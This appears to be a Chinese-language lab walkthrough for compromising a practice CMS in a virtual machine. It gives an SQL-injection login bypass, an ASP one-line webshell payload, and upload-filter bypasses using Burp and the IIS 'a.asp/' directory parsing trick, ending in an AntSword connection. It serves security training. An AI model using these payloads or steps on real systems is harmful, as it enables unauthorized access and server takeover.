小编点评

**前期准备软件：** - burp - 中国蚁剑环境：酷维网站 - VM虚拟机具体操作 1. 网站管理打开，进入bookpic目录（C:\Inetpub\cms\cms\bookpic） 2. 调出属性，修改为IP 3. 用物理机打开网站，进入admin目录，进入http://192.168.1.29/admin/Admin_Login.asp后台管理界面使用万能密码账号：admin 'or 1=1-- 密码：任意 4. 打开burpsuit，配置一下proxy（switchy omega）上传+绕过有两个方法方法 **方法一：制作一句话木马图片** - 访问上传路径 - 上传成功后台数据库也有显示这里有点问题，jpg蚁剑连不了，要php格式的文件，连接失败这种适合传前格式验证，上传后bp抓包改jpg后缀为php才能用蚁剑连接 **方法二：使用burp绕过** - 制作1.asp一句话木马文本输入<%eval request (\"POST\")%> 另存为在1.asp文件里一句话木马前面多加一些文字信息——为了使文件容量变大，要不然网站识别不了上传后抓包，修改文件路径为bookpic/a.asp/，再修改文件上传后缀为jpg，放行，拦截关闭访问路径：IP/bookpic/a.asp/20246215171536061.jpg

正文

前期准备

软件：burp，中国蚁剑
环境：酷维网站，VM虚拟机

具体操作

1.网站管理打开，进入bookpic目录（C:\Inetpub\cms\cms\bookpic），添加a.asp文件(一句话木马上传点)

2.调出属性，修改为IP，应用后确定

3.用物理机打开网站，进入admin目录，进入http://192.168.1.29/admin/Admin_Login.asp后台管理界面

使用万能密码 账号：admin 'or 1=1-- 密码：任意

进入后去添加公告里找上传点

4.打开burpsuit，配置一下proxy（switchy omega）

---

上传+绕过有两个方法

方法1

制作一句话木马图片（传前格式验证）

参考——https://blog.csdn.net/weixin_45571987/article/details/115426542

访问上传路径，上传成功

后台数据库也有显示

这里有点问题，jpg蚁剑连不了，要php格式的文件，连接失败

这种适合传前格式验证，上传后bp抓包改jpg后缀为php才能用蚁剑连接

---

方法2

burp绕过（传后格式验证）

制作1.asp一句话木马

文本输入<%eval request ("POST")%> 另存为

在1.asp文件里一句话木马前面多加一些文字信息——为了使文件容量变大，要不然网站识别不了

上传后抓包，修改文件路径为bookpic/a.asp/，再修改文件上传后缀为jpg，放行，拦截关闭

访问路径：IP/bookpic/a.asp/20246215171536061.jpg

没有显示php代码说明解析成功

中国蚁剑连接成功